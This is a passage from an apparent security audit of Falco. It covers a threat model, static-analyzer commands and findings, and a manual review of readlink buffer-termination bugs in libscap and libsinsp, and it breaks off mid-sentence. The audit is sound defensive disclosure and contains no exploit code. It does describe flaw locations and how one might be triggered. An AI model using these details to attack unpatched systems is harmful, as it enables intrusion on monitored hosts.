KubeCon Europe 2022 on new bypasses [7].\nThen, some articles are great to understand the inner workings of Falco, for example this official\nblog post about \u201cMonitoring new syscalls with Falco\u201d [8]. Or articles on personal blogs that try to\ngo deep into the code like this series on Falco design and the source code of Sysdig [9] [10].\nThe previous CVEs on Falco were investigated, first a CVE-2019-8339, a capacity-related vulnera-\nbility in which you can overflow the kernel with events to drop the control on sensitive ones [11].\nThe GitHub security advisory pages on Falco and libs repository [12], containing the recent\nsecurity issues were also looked into.\n1https://falco.org/docs/getting-started/source/\nRef: 23-01-1097-LIV 6 Quarkslab SAS5 Threat model\nFalco maintainers explicitly asked for a threat model, see Figure 5.1 for the threat model proposed\nby Quarkslab\u2019s engineers.\nlibsinsp\nlibscap\nkernel\nprocfskernel\nmodule\nor eBPF syscallsprocess is \ncreatedprocess performs \na syscallrules in yaml \nconfig files\npluginsAttack surface\nscap_proc_scan_proc_dirsinsp_parser::process_eventfilter::parser::parse\nuser space\nkernel spaceadmin\naccess \nuser \naccess \ncreate\nreadcritical\nfunctionkernel \ndata \nFigure 5.1: Falco threat model\nThis threat model is a simplified view of the security threats on Falco and is not technically\ncomprehensive. For example, a process creation will also generate a syscall event, which is not\nrepresented on the diagram. The goal of this figure was to identify the security-relevant areas of\nFalco to head the audit in the most interesting direction.\nTo describe further this diagram:\n\u2022the attack surface is represented in red, with items requiring admin access, in green, and\nitems accessible from a normal user using the system, in yellow.\n\u2022Intheboxesinblue,youcanfindthepartsofthecodethatinteractwithsensitiveinformation,\nvia reading data represented with the blue arrows.\nRef: 23-01-1097-LIV 7 Quarkslab SAS\u2022The sensitive parts of the code are reading directly from attack surface items, for the YAML\nconfig files for example, or indirectly from the system, with procfs or the syscalls events.\n\u2022The dotted arrows just represent the relation between the attack surface and the system for\nthe indirect links.\n5.1 A note on threat actors\nOn the attack surface of Falco, it was important to separate what can be targeted by a superuser\n(i.e., root or admin) and a regular user on the system. Some of the work during this audit targeted\ncomponents that should be accessible only to superusers, see Section 7.1 for an example. This\nfuzzer was built, on one side, to get more familiar with the Falco project and on the other side\nbecause the rules files could theoretically be accessible to unprivileged users if the Linux file\nrights were badly configured.\nAn emphasis should be put on the fact that finding security issues that absolutely require to be a\nsuperuser (i.e., root) is less interesting because having those rights on the host already allows the\nsuperuser to disable Falco completely. Indeed, a superuser could stop the userland program of\nFalco or remove the kernel module, or eBPF probe directly. That\u2019s why the threat model and this\naudit insisted on the attack surface that could be reached by a non-admin user of the system.\nConsidering Falco might be installed on Kubernetes clusters nodes, it\u2019s safe to assume that most\nusers will be non-trusted unprivileged users, or diminished root users in containers. Indeed by\ndefault, as root in Kubernetes pods, the default set of Linux capabilities is restricted, which means\nroot doesn\u2019t have all capabilities, like CAP_SYS_ADMIN or the ones allowing to reboot or remove\nand add kernel modules. In addition, other security mechanisms limit the access to /procor\n/sysas root.\nThepluralityof\u201crootstatus\u201dincontainersenvironmentcreatessomeconfusion. Linuxcapabilities,\nnamespace and the various security modules allow to create more complex combination of rights.\nHowever, considering the most used configuration it should be clarified that regular users on\nthe system, i.e., unprivileged users or containerized root users in Kubernetes pods are the main\nthreat. Root users on the host and root users in privileged containers should be out of the scope of\nthe threat actors. As a matter of fact, privileged containers with root users are almost equivalent\nto root processes on the host: all except the process Linux namespace are disabled, all capabilities\nare granted, virtual file systems are unmasked and LSMs are disabled. It\u2019s trivial to pivot from a\nprivilege container process to \u201ccomplete root\u201d on the host.\nRef: 23-01-1097-LIV 8 Quarkslab SAS6 Static analysis\n6.1 Automated static analyzers\nSome linters and static checkers were selected and tested on the project to find immediate issues\nbut also to see if they could be easily integrated to the project workflows. These tools were mainly\nselected because engineers at Quarkslab were familiar with them and they are (most of them)\nfree and open-source.\n\u2022Cppcheck: a static analysis tool for C/C++ code.\n\u2022CodeQL: a semantic code analysis engine to discover vulnerabilities across a codebase.\n\u2022Infer: a static analysis tool for Java, C++, Objective-C, and C.\n\u2022Scan-Build: a command line utility that enables a user to run the clang static analyzer over\ntheir codebase as part of performing a regular build.\nThese tools are different some of them are linters that can be directly run against the source\ncode, while others need the project to be built to create databases against which the analyzer can\nrun. Some already propose a set of embedded checks, while others are only engines and need\na curated selection of queries. Semgrep was also considered but the support of C/C++ is still\nexperimental.\n6.1.1 Cppcheck\nNote that despite the name, Cppcheck is designed for both C and C++. It can provide good\ninformation on potential memory and resource leaks for example and is really easy to run. It runs\ndirectly on source code and thus could be quickly integrated into a CI step. The version used was\nCppcheck 1.90.\nCppcheck was run on the codebase with the following command:\ncppcheck -j 32 -q --force <folder>\nThe-jflag is used to start 32 threads to do the checking work, the -qto only print something\nwhen there is an error and avoid progression message, --force for checking files that have a\nlot of configurations (using a lot of different combinations depending on C macro). To enable\nmore rules, is it possible to pass the --enable flag, for example --enable=all will output a lot\nof errors that could be associated with style, performance, portability, etc.\nFor this output, the userspace codebase was scanned with the basic checkers enabled.\nlibscap Thefirstissue, online1, isamemoryleakontheheapallocated errorstructure, indeed\nfree(error) should be added just before line 513 in engine/bpf/scap_bpf.c . The second one,\nline 4, is a resource leak, in the case fscanf(pfile, \"%\"PRIu32, &max) returns 0, the function\nwill return without calling fclose(3) . Then, line 7, is a memory leak similar to the first issue, on\nRef: 23-01-1097-LIV 9 Quarkslab SASline 146 of scap.c, afree(handle) should be added just before. For the issues line 10, 13 and\n16, it seems that the pAdapterInfo is allocated and then not used nor freed, which could lead to\na memory leak.\n1engine/bpf/scap_bpf.c:513:3: error: Memory leak: error [memleak]\n2return SCAP_FAILURE;\n3^\n4engine/kmod/scap_kmod.c:67:4: error: Resource leak: pfile [resourceLeak]\n5return 0;\n6^\n7scap.c:146:3: error: Memory leak: handle [memleak]\n8return NULL;\n9^\n10windows_hal.c:325:3: error: Memory leak: pAdapterInfo [memleak]\n11return SCAP_FAILURE;\n12^\n13windows_hal.c:331:3: error: Memory leak: pAdapterInfo [memleak]\n14return SCAP_FAILURE;\n15^\n16windows_hal.c:342:3: error: Memory leak: pAdapterInfo [memleak]\n17return SCAP_FAILURE;\n18^\nLOW 1 Memory leak on errorstructure in libscap/engine/bpf/scap_bpf.c:513\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nLOW 2 Resource leak on pfileinlibscap/engine/kmod/scap_kmod.c:67\nCategory Resource Leak\nRating Impact: Availability Exploitability : None\nLOW 3 Memory leak on handlestructure in libscap/scap.c:146\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nLOW 4 Memory leak on pAdapterInfo structure in libscap/windows_hal.c:342\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nRef: 23-01-1097-LIV 10 Quarkslab SASlibsinsp The first issue, on line 1, with the uninitvar is certainly a false positive. However,\nthememleakOnRealloc issues, on lines 4, 7, 10 are real programing mistakes1. The last one, on\nline 13, is also a real mistake but in the test files, so less problematic.\n1dns_manager.cpp:111:9: error: Uninitialized variable: dinfo [uninitvar]\n2return dinfo;\n3 ^\n4filterchecks.cpp:5174:3: error: Common realloc mistake: 'm_storage 'nulled but not\nfreed upon failure [memleakOnRealloc] \u25c1arrowhookleft\u2192\n5m_storage = (char*)realloc(m_storage, encoded_args_len);\n6^\n7filterchecks.cpp:5326:5: error: Common realloc mistake: 'm_storage 'nulled but not\nfreed upon failure [memleakOnRealloc] \u25c1arrowhookleft\u2192\n8 m_storage = (char*)realloc(m_storage, encoded_tags_len);\n9 ^\n10filterchecks.cpp:5810:4: error: Common realloc mistake: 'm_storage 'nulled but not\nfreed upon failure [memleakOnRealloc] \u25c1arrowhookleft\u2192\n11m_storage = (char*)realloc(m_storage, encoded_tags_len);\n12^\n13test/sinsp_with_test_input.h:95:117: error: va_list 'args2 'was opened but not\nclosed by va_end(). [va_end_missing] \u25c1arrowhookleft\u2192\n14throw std::runtime_error(\"the test framework does not currently support equal\ntimestamps or out of order events\"); \u25c1arrowhookleft\u2192\nINFO 1 Multiple bad handling of realloc return value in libsinsp/filterchecks.cpp\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nINFO 2 Missingva_end() afterva_copy() in test file sinsp_with_test_input.h\nCategory Incorrect handling of variadic macros\nRating Impact: Integrity Exploitability : None\nchisel These three issues are the same, the function realpath_ex in\nuserspace/chisel/chisel_utils.cpp returns a pointer on freed memory. It seems to\nbe a mistake because a variable is created just before, named ret, on line 93, that might be the\nvariable that should be returned.\n1userspace/chisel/chisel_utils.cpp:95:2: error: Returning/dereferencing 'resolved '\nafter it is deallocated / released [deallocret] \u25c1arrowhookleft\u2192\n2return resolved;\n3^\n1More details on how to properly checks the result of realloc: https://stackoverflow.com/a/27589881/4561420 .\nRef: 23-01-1097-LIV 11 Quarkslab SAS4userspace/chisel/chisel_utils.cpp:94:2: note: Returning/dereferencing 'resolved '\nafter it is deallocated / released \u25c1arrowhookleft\u2192\n5free(resolved);\n6^\n7userspace/chisel/chisel_utils.cpp:95:2: note: Returning/dereferencing 'resolved '\nafter it is deallocated / released \u25c1arrowhookleft\u2192\n8return resolved;\n9^\nINFO 3 Returned heap allocated buffer resolved after being deallocated\nCategory Return pointer on freed memory\nRating Impact: Availability Exploitability : None\n6.1.2 Infer\nInfer is an open-source static analysis tool designed for C, C++, Java and Objective-C code\nby Facebook. Similarly to Scan-Build or CodeQL, Infer uses the compilation step to create an\nintermediate representation of the program on which it can then run an analysis. The version\nused for Infer was 1.1.0.\nInfer 1.1.0 is using clang 11 and compiling the whole Falco project with dependencies with it\nwill cause errors during the build process because of tbb2. However, it is possible to build the\nproblematic dependency beforehand to avoid the issue. In addition, some implementations are\nmissingwhencompilingwiththeInfertoolchain,however,adding add_link_options(-latomic)\nfixes the issue.\nLike other tools that create databases during the building process, you need to explicitly ex-\nclude files from the included ones otherwise you end up with a lot of results coming from the\ndependencies code.\nWe managed to make Infer analyze the project with the following setup.\nvim CMakeLists.txt # add 'add_link_options(-latomic) '\nmkdir build-infer && cd build-infer\ninfer compile -- cmake -DUSE_BUNDLED_DEPS=ON ..\nmake -j `nproc `tbb\n2It seems that -flifetime-dse=1 , is not supported on clang 11 with Infer.\nRef: 23-01-1097-LIV 12 Quarkslab SASinfer capture --skip-analysis-in-path b64-prefix --skip-analysis-in-path\nc-ares-prefix --skip-analysis-in-path catch2-prefix --skip-analysis-in-path\ncloudtrail-plugin-prefix --skip-analysis-in-path cloudtrail-rules-prefix\n--skip-analysis-in-path cpp-httplib-prefix --skip-analysis-in-path curl-prefix\n--skip-analysis-in-path cxxopts-prefix --skip-analysis-in-path fakeit-prefix\n--skip-analysis-in-path grpc-prefix --skip-analysis-in-path jq-prefix\n--skip-analysis-in-path json-plugin-prefix --skip-analysis-in-path\nk8saudit-plugin-prefix --skip-analysis-in-path k8saudit-rules-prefix\n--skip-analysis-in-path njson-prefix --skip-analysis-in-path openssl-prefix\n--skip-analysis-in-path protobuf-prefix --skip-analysis-in-path re2-prefix\n--skip-analysis-in-path string-view-lite-prefix --skip-analysis-in-path\ntbb-prefix --skip-analysis-in-path valijson-prefix --skip-analysis-in-path\nyamlcpp-prefix --skip-analysis-in-path zlib-prefix -- make -j `nproc `\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\ninfer analyze\nResults\nDuring our scan, it found 105 issues. See the following list for comments on the results, you\nwill need Infer report to follow, you can find the report under the name infer-report.txt or\nan abbreviated version in the Appendix B containing only the errors mentioned in the following\ncomments.\n\u202227 Null Dereferences - 13 of these errors come from unchecked return value from malloc,\ncalloc andrealloc that could lead to Null dereferences, it is errors number 9, 15, 16, 25,\n28, 29, 42, 45, 52, 57, 59, 74 and 80.\nError number 17 is similar, on error localtime(3) returns Null which is not checked in\nthe code. Errors 54, 56 and 69 are very similar, sinsp_threadinfo::get_fd_table can\nreturn Null and the value is not checked, it\u2019s even immediately dereferenced for case 69.\nFor error 79, potentially scap_write_proclist_begin can return Null and the returned\npointer is dereferenced in scap_write_proclist_end later.\nErrors 43, 51, 53, 67, 68, 70, 71, 87 and 88 are issues of dereferences in hashmap macro\nHASH_ADD_INT64 .\n\u20227 Resource Leaks - interestingly, the first resource leak, number 13 is the same as the\none detected by Cppcheck in libscape/engine/kmod/scap_kmod.c and is valid. See low\nRecommendation 2.\nError number 24 is a false positive, it\u2019s not considering sinsp_logger destructor that is\nproperly closing the related files.\nError number 38 is a real issue but in libsinsp/examples/test.cpp which is not sensitive.\nErrors 60, 61 and 62 are false positives since these files descriptors are saved and the files\nare closed by calling scap_dump_close .\nThe last error 78 seems to be a false positive because the normal flow actually closedir on\nthetaskdir_p properly and the error flow as well.\n\u202226 Dead Stores - 9 of these errors are raised from the driver folder. While dead stores do\nnot have security implications by themselves, the compiler optimizing them out can lead to\nRef: 23-01-1097-LIV 13 Quarkslab SASsecurity issues if the underlying memory should be rewritten. However, it does not seem\nthat these dead stores are because of memory reset for sensitive information. They can still\nbe checked for program correctness because they might imply a programming mistake (a\nvar assigned in the place of another).\n\u202217 Static Initialization Order Fiascos - all these errors come from detection on GTest\nTEST_CASE macro. We can consider them as false positives and due to the use of GTest.\n\u202228 Uninitialized Values - these errors seems to be false positive of access to uninitialized\nvariables.\nLOW 5 Multiple unchecked return value from malloc,callocandrealloc\nCategory Null dereference\nRating Impact: Availability Exploitability : None\nLOW 6 Multiple unchecked return value from localtime ,sinsp_threadinfo::get_-\nfd_table andscap_write_proclist_begin that can return Nullptr\nCategory Null dereference\nRating Impact: Availability Exploitability : None\nINFO 4 Multiple potential Null pointer dereferences in macro HASH_ADD_INT64\nCategory Null dereference\nRating Impact: Availability Exploitability : None\nINFO 5 Resource leak in libsinsp example libsinsp/examples/test.cpp\nCategory Resource leak\nRating Impact: Availability Exploitability : None\n6.1.3 CodeQL\nFirst, contrary to the other tools mentioned here, CodeQL is not entirely open source. It\u2019s free\nfor research and open source, the queries are open source but the engine is closed source and\npublished as a binary. It was originally built by a company named Semmle that hosted the product\nonlgtm.com with the idea of massively scanning open-source projects. Semmle was acquired\nby GitHub (itself owned by Microsoft) and is now integrating CodeQL into github.com and\ndeprecating lgtm.com . The versions used were CodeQL command-line toolchain release 2.11.2\nand the Visual Studio Code extension v1.7.5.\nTo use CodeQL, an SQL database of the source code and data flow must be built prior to analysis.\nRef: 23-01-1097-LIV 14 Quarkslab SAScodeql database create --language=cpp -j 32 --ram=25000 --command=\"make -j 32\"\nfalco-db \u25c1arrowhookleft\u2192\nNote that the --language=cpp flag includes C code as well, the -jand--ramflags are to adjust\nthe process of creation to our resources available, the --command flag allows to pass a custom\nbuild command to trigger the compilation and the last argument is the name of the database\nfolder.\nWarning\nBecause CodeQL is creating a database based on everything that was compiled dur-\ning the build the process, it results in a pretty large database, including information\nabout the dependencies like OpenSSL, protobuf, curl, etc.\nThis is the main issue with using CodeQL on Falco at the moment because executing\nany queries on the resulting database can lead to a lot of noise from dependencies\nand thus make the results difficult to browse.\nBecause CodeQL does not come bundled with predefined queries, it\u2019s more complicated to\nexhibit particular results from the analysis. However, the open source queries can be found\nin thegithub/codeql3repository. And especially, C and C++ queries, can be found under\ncodeql/cpp/ql/src4.\nThe rule sets used were the ones under Security/CWE andCritical . There were a lot of outputs,\nwith a lot of noise, coming from dependencies and false positives. The results will not be printed\nhere but they were an important inspiration for the manual review. The queries were run through\nthe Visual Studio Code extension of CodeQL.\n6.1.4 Scan-Build\nScan-Build is a tool to run the Clang static analyzer5, part of the LLVM project, on a codebase.\nYou can also use CodeChecker instead of Scan-Build6which might be more adequate for large\nprojects. During a project build, as source files are compiled they are also analyzed in tandem by\nthe static analyzer. Upon completion of the build, results are then presented to the user within a\nweb browser. The version used of Scan-Build is the one packaged with the LLVM 10 clang-tools\npackage on Ubuntu 20.04.\nSimilarly to Infer and CodeQL, this tool requires compiling the codebase and checking the built\ncode. Thus, it, by default, raises tons of alerts on dependencies that were built along Falco.\nAt first, we struggled to make Scan-Build work on the project, see Appendix C for more details.\nFinally, we used the following command to scan and output only the bugs found on Falco\u2019s\ncodebase and it worked, resulting in 202 warnings (with 41 \u201cbugs\u201d from the security checkers\nthat are mostly just grepping some sensitive functions, which could be disabled):\n3https://github.com/github/codeql\n4https://github.com/github/codeql/tree/main/cpp/ql/src\n5https://clang-analyzer.llvm.org/\n6https://clang-analyzer.llvm.org/command-line.html\nRef: 23-01-1097-LIV 15 Quarkslab SAScmake -DUSE_BUNDLED_DEPS=ON\n-DCMAKE_C_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/ccc-analyzer\n-DCMAKE_CXX_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/c++-analyzer\n..\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nscan-build -enable-checker unix,nullability,core,cplusplus,security --exclude\nb64-prefix --exclude c-ares-prefix --exclude catch2-prefix --exclude\ncloudtrail-plugin-prefix --exclude cloudtrail-rules-prefix --exclude\ncpp-httplib-prefix --exclude curl-prefix --exclude cxxopts-prefix --exclude\nfakeit-prefix --exclude grpc-prefix --exclude jq-prefix --exclude\njson-plugin-prefix --exclude k8saudit-plugin-prefix --exclude\nk8saudit-rules-prefix --exclude njson-prefix --exclude openssl-prefix\n--exclude protobuf-prefix --exclude re2-prefix --exclude\nstring-view-lite-prefix --exclude tbb-prefix --exclude valijson-prefix\n--exclude yamlcpp-prefix --exclude zlib-prefix make -j 32\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nNote that the --exclude flag will not disable checking the code of dependencies but just filter out\nthe results in the report. That\u2019s why this scan can take a significant amount of time to process.\nScan-Build generates an HTML report that explains each issue in detail, illustrating the multiple\nsteps and the branches the program must take to be in the situation indicated by the tool. The\nHTML report generated from the above steps will be included with this report under the file name\nscan-build-44d1c1e.tar.gz , open the index.html file for more information.\nResults\nApart from the security checkers (security checker is just issuing warning based on some function\nname), the clang static analyzer found some potential issues. Here are some comments on what\nit found, some issues seem real, some are certainly false positives, and some may come from\nconfusion in macros.\n\u2022A double free - in libscap scap.cfile, from the scap_open function, when calling scap_-\nopen_udig_int , a double free occurs because the function that calls scap_close(handle)\nwill free the handle, and on the next line, the handle is freed again with free(handle) .\nRemoving line 317 should solve the issue.\n\u2022A garbage return value - in libsinsp sinsp.cpp , the function sinsp::get_read_-\nprogress_with_str , with a specific control flow execution detailed in the report, can\nreturn a non-initialized stack variable, which might be garbage and disrupt the execution.\n\u2022A dangerous construct in a vforked process - in the code related to the gvisor engine in\nlibscap/engine/gvisor/runsc.cpp , the vforked process is closing a file descriptor which\ncould be an undefined behavior according to POSIX, and it should not call exit(3) as well.\nSome refactoring could be done considering the restriction and caution on using vfork(2) .\n\u2022Ten NULL pointer dereferences - the path of execution are various in length but it might\nbe interesting to investigate these highlight to fix this potential issues that could result in\ncrashes.\n\u2022Five cases of argument with nonnull attribute passed null - the static analyzer re-\nvealed 41 issues like that, it seems that most of them are not interesting because they\nhighlight a potential null value in a comparison with an int. However, five of these\nRef: 23-01-1097-LIV 16 Quarkslab SAShighlights result in a null pointer being passed to arguments of memcpy, three of\nthem the destination, and two of them the source. Here are their names in the scan-\nbuild-44d1c1e.tar.gz archive: report-2dfbca.html ,report-9cb243.html ,report-\n760867.html ,report-940464.html ,report-e46a72.html .\n\u2022Five memory leaks - in various places of the codebase, they seem to be realistic scenarios\nof memory leaks. Some involve more steps than others and their path of execution might\nterminate execution but should be investigated.\n\u2022Four dead store issues - two dead assignments and two dead increments which are real\nbut might not even be considered as bugs since eliminating them could lead to other bugs\nin the future by missing these assignments and increments.\n\u2022Use of zero allocated memory -infunctionscap_write_proc_fdswhichiscertainlyexpected,\nso a false positive.\n\u2022Some division by zero and use-after-free issues - a total of eighteen issues that seem to\nbe false positives confusions because of the usage of macro for hash maps manipulation.\nLOW 7 Double free in libscap/scap.c functionscap_open\nCategory Double free\nRating Impact: Integrity, Confidentiality,\nAvailabilityExploitability : None\nLOW 8 Garbage return value from stack in libsinsp/sinsp.cpp\nCategory Garbage return value\nRating Impact: Availability Exploitability : None\nINFO 6 Dangerous construct in a vforked process in lib-\nscap/engine/gvisor/runsc.cpp\nCategory Incorrect use of vfork\nRating Impact: Availability Exploitability : None\n6.1.5 Conclusion\nThese four static analyzers produced interesting results. Because CodeQL cannot, at the moment,\nexclude files on database creation or systematically exclude files at the analysis stage, it\u2019s a bit\ndifficult to integrate with Falco. Otherwise, including Cppcheck is easy since it\u2019s directly running\non the source code. Then, integrating more elaborate analyzers like Infer and Scan-Build is more\ncomplex, but possible, and can provide more hints on potential issues in the future.\nRef: 23-01-1097-LIV 17 Quarkslab SASOn top of that, some analyzers like Infer have options for differential analysis, thus running only\non the addition that was made in a pull request7, thus cutting the noise from the rest of the\nproject issues. Cppcheck can also only run on specified files, which can limit the scope of the\nanalysis but provide useful information.\n6.2 Manual review\nThe manual review was mainly performed in two ways, trying to find issues in sensitive areas,\nsuch as some libscap functions for example, and systematically searching for particular patterns\non all code base. The first way guiding the latter. The code reviewed was the code of the libs.\n6.2.1 Issues with readlink\nFrom the Falco threat model (see Figure 5.1) we identified that libscap functionscap_proc_-\nscan_proc_dir must be investigated. Indeed, being able to influence procfs content is at the\nreach of every user of the system by starting carefully crafted processes. Such a function, because\nit is parsing text from the procfs file interface is highly specific to Linux and building an automated\nfuzzing setup, reproducing the whole procfs interface, would be extremely time-consuming and\nquickly out of date. That is why a manual review would be more efficient for this part of the code.\nIssue in scap_proc_fill_root with readlink\nMost of the code manipulating strings is carefully terminating them with 0but an issue was\nspotted in the function that is called to retrieve the root folder path of a process.\n554 static int32_t scap_proc_fill_root(scap_t *handle, struct scap_threadinfo * tinfo,\nconst char * procdirname) \u25c1arrowhookleft\u2192\n555{\n556 charroot_path[SCAP_MAX_PATH_SIZE];\n557 snprintf(root_path, sizeof(root_path), \"%sroot\", procdirname);\n558 if( readlink(root_path, tinfo->root, sizeof(tinfo->root)) > 0)\n559 {\n560 returnSCAP_SUCCESS;\n561 }\n562 else\n563 {\n564 snprintf(handle->m_lasterr, SCAP_LASTERR_SIZE, \"readlink %s failed (%s)\",\n565 root_path, scap_strerror(handle, errno));\n566 returnSCAP_FAILURE;\n567 }\n568}\nTheissueisthat readlink doesnotnull-terminatethestringthatwillreadandcopiedinto tinfo-\n>rootand the size of the buffer is sizeof(tinfo->root) instead of sizeof(tinfo->root) - 1\nto let space for inserting a zero at the last index. Thus it\u2019s possible to create a path exceeding\n7https://fbinfer.com/docs/steps-for-ci\nRef: 23-01-1097-LIV 18 Quarkslab SASSCAP_MAX_PATH_SIZE and chroot a program into it in order for this part of the code to write a\nnot null-terminated string into the structure of the size.\nSee the following listing for the structure in which the root buffer appears, on line 8.\n1typedef struct scap_threadinfo\n2{\n3 // [...] abbreviated\n4 int64_t vtid;\n5 int64_t vpid;\n6 charcgroups[SCAP_MAX_CGROUPS_SIZE];\n7 uint16_t cgroups_len;\n8 charroot[SCAP_MAX_PATH_SIZE+1];\n9 intfiltered_out; ///< nonzero if this entry should not be saved to file\n10 scap_fdinfo* fdlist; ///< The fd table for this process\n11 uint64_t clone_ts;\n12 int32_t tty;\n13 int32_t loginuid; ///< loginuid (auid)\n14\n15 UT_hash_handle hh; ///< makes this structure hashable\n16}scap_threadinfo;\nIn theory, because the static size buffer is inserted directly in the structure, the situation could\npotentially mean that future reads of this string, supposed to be null-terminated, could overflow\nand read the data of the next structure\u2019s fields values. However, the size of the buffer is SCAP_-\nMAX_PATH_SIZE + 1 , which translates to 1025, so the compiler will align the next fields, resulting\nin the next integer to be shifted by some blocks. And because this structure is allocated using\ncalloc, the bytes hole will be filled with zeros. The result will be a string with a size equal to\nthe expected length plus one, which could potentially be an issue with copies trusting that the\nstring is well formed.\nIt seems that this situation is not present in the codebase, for example, line 433 of\nuserspace/libscap/scap_savefile.c , the computation of the length is performed using\nstrnlen using the constant 1024 as max length rootlen = (uint16_t)strnlen(root, SCAP_-\nMAX_PATH_SIZE); .\nFind in Appendix D more information about how to exploit this issue and debug with GDB to\nunderstand the situation.\nMEDIUM 1 Potential buffer overflow due to not null terminated output of readlink inlib-\nscap/scap_proc_file_root\nCategory Buffer overflow\nRating Impact: Availability, Integrity Exploitability : None\nRef: 23-01-1097-LIV 19 Quarkslab SASSearching similar issues in libscap\nBecause a first issue was found with readlink , other parts of the codebase were investigated\nlooking for the same programming mistake. We used ripgrep8to search the codebase.\nuserspace/libscap/scap_procs.c\n63: target_res = readlink(filename, tinfo->cwd, sizeof(tinfo->cwd) - 1);\n558: if ( readlink(root_path, tinfo->root, sizeof(tinfo->root)) > 0)\n723: target_res = readlink(filename, target_name, sizeof(target_name) - 1);\n// Getting the target of the exe, i.e. to which binary it points to \u25c1arrowhookleft\u2192\n756: // null-terminate target_name (readlink() does not append a null byte)\nInuserspace/libscap/scap_procs.c , the issue from the previous section is present on line\n558, where tinfo->root is not null terminated. On line 63 and line 723, the bufsize , third\nargument of readlink is correctly set to the size of the buffer minus one.\nuserspace/libscap/scap_fds.c\n418: r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n619: r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n727: r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n1609: r = readlink(f_name, link_name, sizeof(link_name));\nInuserspace/libscap/scap_fds.c , all the readlink call are made with\nSCAP_MAX_PATH_SIZE (even in the forth case, because link_name is always initialized as\nchar link_name[SCAP_MAX_PATH_SIZE]; ). The issue is that then these buffer are manually null\nterminated doing link_name[r] = \u2019\\0\u2019; leading to an overflow by one. Let\u2019s see an example,\nthe one line 619:\n616 charlink_name[SCAP_MAX_PATH_SIZE];\n617 ssize_t r;\n618\n619r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n620 if(r <= 0)\n621{\n622 returnSCAP_SUCCESS;\n623}\n624\n625link_name[r] = '\\0';\nCompiled with -O0, the compiler lets the locals in the order there are declared on the stack, thus\nwe have on the stack (in the order of the stack growth), the return address, a canary, the frame\npointer and the end of the link_name . So the line link_name[r] = \u2019\\0\u2019; will effectively write\na zero out of bound on the frame pointer, which might start with zeros.\nSo in this precise situation, there are no consequences. But in a different setup, where locals\ncould be located before the buffer, the stack overflow could theoretically lead to issues.\nIt is recommended to always readlink with abufsize of the buffer size minus one, and then to\ncorrectly null terminate the string using the return value as the index.\n8https://github.com/BurntSushi/ripgrep\nRef: 23-01-1097-LIV 20 Quarkslab SASLOW 9 Four null terminations of buffers written out of range by one in libscap/scan_-\nfds.c\nCategory Buffer overflow\nRating Impact: Availability, Integrity Exploitability : Easy\nSearching similar issues in libsinsp\nuserspace/libsinsp/sinsp_auth.cpp\n71: ssize_t sz = readlink(fd_path.c_str(), buf, sizeof(buf));\n72- if(sz != -1 && sz <= static_cast<ssize_t>(sizeof(buf)))\n73- {\nThebufsize is equal to sizeof(buf) but it\u2019s not an issue since the value is later copied using\nreal size of the content of buf using std::string::assign .\nuserspace/libsinsp/threadinfo.cpp\n1108: ret = readlink(proc_path, dirfd_path, sizeof(dirfd_path) - 1);\n1109- if (ret < 0)\n1110- {\nInthreadinfo.cpp , the second finding of the above output, the bufsize is correctly specified.\nuserspace/libsinsp/parsers.cpp\n4486: target_res = readlink((chkstr + \"/\").c_str(),\n4487- target_name,\n4488- sizeof(target_name) - 1);\nFinally, in parsers.cpp , thetarget_name buffer is not null terminated which could lead to an\noverflow. However this piece of code is by default not used, you must specify the -Aflag to analyze\nthegetcwdsyscall. And on top of that, it is only debug code that is not shipped in the release.\nINFO 7 Buffer overflow with not null terminated output of readlink in debug code in\nlibsinsp/parsers.cpp\nCategory Buffer overflow\nRating Impact: Availability, Integrity, Confi-\ndentialityExploitability : None\nChecking the return value of readlink\nIn the previous sections, we searched for potential buffer overflows but, in addition to this issue,\nmost of these usages of readlink are potentially vulnerable to referring to the wrong file. Indeed,\nRef: 23-01-1097-LIV 21 Quarkslab SASreadlink takes the bufsize as a third argument and if the return value is equal to this, it means\nthat \u201ctruncation may have occurred\u201d. The return value should be compared against bufsize and\nincrease the buffer or handle the error properly.\nIn many situations above, especially when reading from files in /proc/%d/fd , this issue is almost\nimpossible to exploit since it would require a legitimate absolute path target longer than 1024\nbytes because the path in the fddirectory are already canonicals thanks to the kernel.\nExample in userspace/libsinsp/sinsp_auth.cpp , line 71. Thereadlink call could result\nin a situation where it returns bufsize , its third argument, which here is sizeof(buf) . In this\nsituation \u201ctruncation may have occurred\u201d and it\u2019s not possible to know if the path was exactly this\nsize or more. This means that the buffer could contain a path to a different file than expected . See\nthis extract of the method.\n1std::string sinsp_ssl::memorize_file( conststd::string& disk_file)\n2{\n3 std::string mem_file;\n4 // [...]\n5 if(fd != -1)\n6 {\n7 charbuf[FILENAME_MAX] = { 0 };\n8 std::ifstream ifs(disk_file);\n9 std::string fd_path = \"/proc/self/fd/\" + std::to_string(fd);\n10 ssize_t sz = readlink(fd_path.c_str(), buf, sizeof(buf));\n11 if(sz != -1 && sz <= static_cast <ssize_t>(sizeof(buf)))\n12 {\n13 mem_file.assign(buf, sz);\n14 std::string str;\n15 std::ofstream ofs(mem_file, std::ofstream::out);\n16 while(std::getline(ifs, str))\n17 {\n18 ofs << str << '\\n';\n19 }\n20 }\n21 // [...]\n22 returnmem_file;\n23}\nSo if the real path behind the file descriptor symlink is too long, 